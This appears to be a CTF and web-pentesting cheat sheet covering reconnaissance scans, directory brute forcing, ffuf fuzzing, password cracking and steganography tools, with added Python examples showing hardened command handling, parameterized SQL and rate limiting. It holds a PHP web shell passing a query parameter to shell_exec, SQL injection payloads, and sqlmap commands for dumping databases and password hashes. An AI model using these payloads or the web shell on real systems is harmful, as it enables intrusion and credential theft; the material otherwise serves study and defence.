nmap
● nmap -sV -sC -oA <ip_address> (quick scan; to get the IP address, ping the target URL)
● nmap -p- -sV -sC -oA <ip_address> (scan all ports)
nikto
● nikto -h <URL_target>
directory brute force
● dirb <URL_target>
○ -f (to force)
○ -r (scan sub-dir)
● gobuster dir -u <URL_target> -w /usr/share/dirb/wordlists/[Link]
command injection vulnerability
<?php
// whatever arrives in the cmd query parameter is passed straight to the shell (the vulnerability)
echo "<pre>";
echo shell_exec($_GET['cmd']);
echo "</pre>";
exit();
get_header(); // unreachable after exit()
?>
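Hardened counterpart, added here as example code (written in Python rather than PHP, and not taken from the page): the endpoint still reads a cmd query parameter like the snippet above, but maps it onto a fixed allowlist of argv lists, validates the single permitted argument with a strict pattern, and never involves a shell, so the quotes, semicolons and backticks a command-injection payload relies on are inert. The action names, the ping/uptime commands and the host pattern are assumptions chosen for this example.

```python
import re
import subprocess
from urllib.parse import parse_qs

# Hypothetical allowlist for the demo: each action maps to a fixed argv prefix.
ALLOWED_ACTIONS = {
    "uptime": ["uptime"],            # takes no argument
    "ping": ["ping", "-c", "1"],     # takes exactly one host argument
}

# Only plain hostnames / IPv4 literals are accepted: no spaces, ; | & $ ( ) ` or quotes.
HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def build_argv(query_string: str) -> list:
    """Turn ?cmd=<action>&arg=<host> into an argv list, or raise ValueError.

    The result is meant for subprocess.run() without shell=True, so the
    process receives the argument as one literal string, never as shell text.
    """
    params = parse_qs(query_string, keep_blank_values=True)
    action = params.get("cmd", [""])[0]
    if action not in ALLOWED_ACTIONS:
        raise ValueError(f"action not allowed: {action!r}")
    argv = list(ALLOWED_ACTIONS[action])
    arg = params.get("arg", [None])[0]
    if action == "ping":
        if arg is None or not HOST_RE.fullmatch(arg):
            raise ValueError(f"invalid host: {arg!r}")
        argv.append(arg)
    elif arg is not None:
        raise ValueError(f"{action} takes no argument")
    return argv


def is_accepted(query_string: str) -> bool:
    """True when the request maps onto an allowlisted command with a valid argument."""
    try:
        build_argv(query_string)
        return True
    except ValueError:
        return False


def run_command(query_string: str) -> str:
    """Execute the validated argv directly (no shell) and return its stdout."""
    argv = build_argv(query_string)
    return subprocess.run(argv, capture_output=True, text=True, timeout=10).stdout


if __name__ == "__main__":
    # Constructed requests: the first two are legitimate, the rest are injection attempts.
    for qs in ["cmd=uptime", "cmd=ping&arg=example.com", "cmd=uptime%3Bid",
               "cmd=ping&arg=127.0.0.1%3B+id", "cmd=ping&arg=%24(id)", "cmd=ls"]:
        print(f"{qs:32} -> {'accepted' if is_accepted(qs) else 'rejected'}")
```

Compare with the PHP above: there the shell parses the value, so `;` and `$(...)` are operators; here the value can only ever become one argv element of a pre-chosen program.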
sql injection
● ' or 1=1 -- -
● administrator' --
● 1' UNION SELECT 1,2;-- -
● 1' or "1"="1
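Added illustration (example code written for this note, not from the page or from sqlmap): a throwaway SQLite users table with constructed accounts, and two of the payloads above run as the username against a string-concatenated login query and a parameterized one. In the concatenated version the quote and the trailing comment rewrite the WHERE clause; in the parameterized version the same text is bound as a literal username and matches nothing.

```python
import sqlite3

# Constructed sample accounts for the demo; not real credentials
SAMPLE_USERS = [("administrator", "hunter2"), ("alice", "s3cret")]

# Two payloads from the list above
PAYLOADS = ["' or 1=1 -- -", "administrator' --"]


def make_db() -> sqlite3.Connection:
    """In-memory database with a minimal users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username: str, password: str):
    """The input is pasted into the SQL text, so quotes and comments change the query."""
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    """Bound parameters: the driver sends the input as data, never as SQL."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def compare(payload: str, password: str = "wrong-password"):
    """Return (vulnerable result, safe result) for one payload used as the username."""
    conn = make_db()
    return login_vulnerable(conn, payload, password), login_safe(conn, payload, password)


if __name__ == "__main__":
    for p in PAYLOADS:
        vuln, safe = compare(p)
        print(f"{p!r:22} concatenated -> {vuln!r:16} parameterized -> {safe!r}")
```

With `' or 1=1 -- -` the concatenated query becomes `... WHERE username='' or 1=1 -- -' AND password='...'`: the password check is commented out and the first row (the administrator) is returned without any credentials, which is exactly what the parameterized query prevents.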
sqlmap
example: sqlmap -u <target> --dbs
● -u <target_URL>
● --all
● --dbs (list all databases)
● --tables
● --columns
● --dump
● --risk=3 #MAX
● --level=5 #MAX
● sqlmap -u <target_URL> -D <database_name> --tables (list the tables of the database)
● sqlmap -u <target_URL> -D <database_name> -T <table_name> --columns (list the columns of a table in the database)
● sqlmap -u <target_URL> -D <database_name> -T <table_name> --dump (can crack the passwords directly if any are found)
● -C <column names, e.g. username,password> --dump
● sqlmap -u <target_URL> -D <database_name> --dump-all (dump the entire contents of the database)
● --hostname #Get hostname
● --current-user #Show the current user the SQL queries run as
● --is-dba #Check if current user is Admin
● --users #List all SQL users
● --passwords #Get the password hashes of the users of the SQL instance
● --privileges #Get privileges
Dump Password :
● sqlmap -u <target_URL> -C password --dump
● sqlmap -D <database_name> -T <table_name> --dump
OWASP ZAP
download OWASP ZAP > [Link]
- two ways to use it > automated and manual
- automated > paste the link > view the spider > view the alerts file (information) > find the attacker > replace the url with 'attack'
- manual > enable HUD > launch > add scope > login > find the target > remove out of scope > find the http request (search) > attack (active scan) the file > alerts > find the attacker > copy the url with attack > search with 'attacker'
BURPSUITE
- create a profile > proxy > intercept on > enter pass > proxy (right-click) > send to repeater > repeater > inspector > select the user id > closing bracket (delete & and add [']) > add (or admin='t') > enter > add (-- ' ") > delete user (leaving password) > send > login with admin@blabla and our password
FFUF
install:
1. sudo add-apt-repository -y ppa:longsleep/golang-backports
2. sudo apt update
3. sudo apt install -y golang-go
4. cd ~
5. go get [Link]/ffuf/ffuf
6. sudo ln -s ~/go/bin/ffuf /usr/sbin/ffuf
7. cd ~
8. git clone [Link]
9. cd ffuf
10. go get
11. go build
12. sudo ln -s ~/go/bin/ffuf /usr/sbin/ffuf
practice > [Link]
- ffuf -w ~/wordlists/[Link] -u [Link] (This should have discovered the files class and [Link])
- ffuf -w ~/wordlists/[Link] -recursion -u [Link] (This scan should uncover the directory /admin and then /admin/users and finally the file /admin/users/96)
- ffuf -w ~/wordlists/[Link] -e .log -u [Link] (The above scan should have found the file /logs/[Link])
- ffuf -w ~/wordlists/[Link] -u [Link] -ms <status> -fs <size> (This should cut the results down to just one file, secret)
- ffuf -w ~/wordlists/[Link] -u [Link] -ms <status> -fw <words> (This should cut the results down to just one file, secret)
- ffuf -w ~/wordlists/[Link] -u [Link] -ms <status> -ac (This should cut the results down to just one file, secret)
- ffuf -w ~/wordlists/[Link] -u [Link] -ms <status> (The above command should have returned the missing parameter of debug)
- ffuf -w ~/wordlists/[Link] -t 5 -p 0.1 -u [Link] -mc <status> [the -p switch causes the application to pause 0.1 seconds per request and the -t switch creates 5 versions of ffuf, which means a maximum of 50 requests per second] (Now you shouldn't get any more 429 errors and you should find the oracle file)
- seq 1 1000 | ffuf -w - -u [Link] (The above command should discover a valid result of 657)
- [Save the following script as hashit in /usr/local/bin with execute permissions so it's available from any directory.]
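Server-side view of the same numbers, as an added example (not from the page or from ffuf): a token-bucket limiter, the usual mechanism behind the 429 responses mentioned above, fed with the evenly spaced stream that 5 threads pausing 0.1 s each produce. The limit values (10/s and 100/s), the burst sizes and the even request spacing are assumptions chosen for the demo; integer "millitokens" keep the arithmetic exact so the counts are reproducible.

```python
from dataclasses import dataclass, field

MILLI = 1000  # 1 token = 1000 millitokens; integer maths avoids float drift


@dataclass
class TokenBucket:
    """Server-side limiter: rate_per_s tokens refill per second, up to capacity."""
    rate_per_s: int
    capacity: int
    tokens: int = field(init=False)
    last_ms: int = field(init=False, default=0)

    def __post_init__(self):
        self.tokens = self.capacity * MILLI  # the bucket starts full

    def allow(self, now_ms: int) -> bool:
        """Spend one token for a request arriving at now_ms; False means HTTP 429."""
        elapsed = now_ms - self.last_ms
        self.last_ms = now_ms
        # rate_per_s tokens per 1000 ms is rate_per_s millitokens per ms
        self.tokens = min(self.capacity * MILLI, self.tokens + elapsed * self.rate_per_s)
        if self.tokens >= MILLI:
            self.tokens -= MILLI
            return True
        return False


def client_rate_per_s(threads: int, pause_s: float) -> float:
    """Upper bound on the fuzzer's request rate: each thread sends one request per pause."""
    return threads / pause_s


def simulate(limit_per_s: int, burst: int, threads: int, pause_s: float, duration_s: int = 1):
    """Push an evenly spaced stream at the client's rate through the limiter.

    Returns (requests answered 200, requests answered 429).
    """
    n = round(client_rate_per_s(threads, pause_s) * duration_s)
    interval_ms = round(1000 * duration_s / n)
    bucket = TokenBucket(limit_per_s, burst)
    ok = sum(bucket.allow(k * interval_ms) for k in range(n))
    return ok, n - ok


if __name__ == "__main__":
    print("client rate:", client_rate_per_s(5, 0.1), "req/s")   # 5 threads, 0.1 s pause
    print("limit 10/s, burst 10 :", simulate(10, 10, 5, 0.1))     # most requests get 429
    print("limit 100/s, burst 100:", simulate(100, 100, 5, 0.1))  # nothing is throttled
```

The page's "no more 429 errors" therefore only means that 50 req/s sits under that particular target's limit; a limiter set at 10/s with a burst of 10 still rejects 31 of the 50 requests in the first second, which is also the signal a defender would alert on.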
#!/bin/bash
# hashit: read values from stdin and print each one md5-hashed, base64-encoded, or unchanged
while read -r i
do
  if [ "$1" == "md5" ]; then
    echo -n "$i" | md5sum | awk '{ print $1 }'
  elif [ "$1" == "b64" ]; then
    echo "$i" | base64   # the trailing newline is encoded too, so 888 becomes ODg4Cg==
  else
    echo "$i"
  fi
done
- seq 1 1000 | hashit b64 | ffuf -w - -u [Link] (The above
command should discover a valid result of ODg4Cg== which is integer 888)
- seq 1 1000 | hashit md5 | ffuf -w - -u [Link] (The above
command should discover a valid result of 4daa3db355ef2b0e64b472968cb70f0d which
is integer 934)
password cracking
● hashcat
○ hashcat -m <hash-type> -a 0 /home/deetz/Downloads/<[Link]> /usr/share/wordlists/[Link]
○ --show (show the cracked output)
○ --force (brute force mode)
○ -a 1 (combinator attack)
● johntheripper
○ pdf2john > ….txt
○ john ….txt
CASE:
Find the flag in a file without an extension
● strings <file name> | grep -i flag
State the SHA256 hash of that file!
● use the "sha256sum" command followed by the file name.
metadata
● exiftool <file name> (metadata analysis)
● steghide extract -sf <file name> (look for hidden messages)
Images :
● exiftool <filename>
● zsteg <filename>
● steghide <filename>
● pngcheck -v <filename>
● stegsolve (GUI)
zip files:
● zipdetails <filename>
● fcrackzip -u -D -p '/usr/share/wordlists/[Link]' <filename>
● zip2john <filename> <outfile>
● john <outfile>